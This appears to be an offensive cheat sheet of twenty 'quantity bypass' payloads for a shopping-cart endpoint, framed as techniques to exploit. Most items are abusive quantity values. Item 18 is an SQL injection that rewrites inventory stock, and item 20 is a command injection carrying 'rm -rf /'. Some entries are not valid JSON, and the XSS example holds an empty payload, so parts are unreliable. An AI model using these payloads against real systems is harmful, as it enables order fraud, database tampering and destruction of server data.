Quantity Bypass Examples
Use these techniques to exploit quantity bypass vulnerabilities:
1. Basic Quantity Bypass:
// Original request
POST /add_to_cart
{
"item_id": "ITEM001",
"quantity": 1
}
// Bypassed request
POST /add_to_cart
{
"item_id": "ITEM001",
"quantity": 1000 // Exceed stock limit
}
2. Negative Quantity Attack:
// Use negative quantities
{
"item_id": "ITEM001",
"quantity": -10
}
// This could result in inventory increase
3. Large Quantity Attack:
// Use very large quantities
{
"item_id": "ITEM001",
"quantity": 999999
}
// Exceed maximum integer limits
4. Decimal Quantity Attack:
// Use decimal quantities
{
"item_id": "ITEM001",
"quantity": 0.5
}
// Fractional quantities
5. String Quantity Attack:
// Use string quantities
{
"item_id": "ITEM001",
"quantity": "1000"
}
// String instead of number
6. Array Quantity Attack:
// Use array quantities
{
"item_id": "ITEM001",
"quantity": [1000]
}
// Array instead of number
7. Object Quantity Attack:
// Use object quantities
{
"item_id": "ITEM001",
"quantity": {"value": 1000}
}
// Object instead of number
8. Boolean Quantity Attack:
// Use boolean quantities
{
"item_id": "ITEM001",
"quantity": true
}
// Boolean instead of number
9. Null Quantity Attack:
// Use null quantities
{
"item_id": "ITEM001",
"quantity": null
}
// Null instead of number
10. Undefined Quantity Attack:
// Use undefined quantities
{
"item_id": "ITEM001",
"quantity": undefined
}
// Undefined instead of number
11. Infinity Quantity Attack:
// Use infinity quantities
{
"item_id": "ITEM001",
"quantity": Infinity
}
// Infinity instead of number
12. NaN Quantity Attack:
// Use NaN quantities
{
"item_id": "ITEM001",
"quantity": NaN
}
// NaN instead of number
13. Scientific Notation Attack:
// Use scientific notation
{
"item_id": "ITEM001",
"quantity": 1e6
}
// Scientific notation for large numbers
14. Hexadecimal Quantity Attack:
// Use hexadecimal quantities
{
"item_id": "ITEM001",
"quantity": 0x3E8
}
// Hexadecimal representation
15. Octal Quantity Attack:
// Use octal quantities
{
"item_id": "ITEM001",
"quantity": 01000
}
// Octal representation
16. Binary Quantity Attack:
// Use binary quantities
{
"item_id": "ITEM001",
"quantity": 0b1111101000
}
// Binary representation
17. Unicode Quantity Attack:
// Use unicode quantities
{
"item_id": "ITEM001",
"quantity": "१०००"
}
// Unicode number representation
18. SQL Injection via Quantity:
// SQL injection in quantity
{
"item_id": "ITEM001",
"quantity": "1; UPDATE inventory SET stock = 999999 WHERE id = 'ITEM001'; --"
}
// SQL injection to modify inventory
19. XSS via Quantity:
// XSS in quantity
{
"item_id": "ITEM001",
"quantity": ""
}
// XSS payload in quantity
20. Command Injection via Quantity:
// Command injection in quantity
{
"item_id": "ITEM001",
"quantity": "1; rm -rf /"
}
// Command injection payload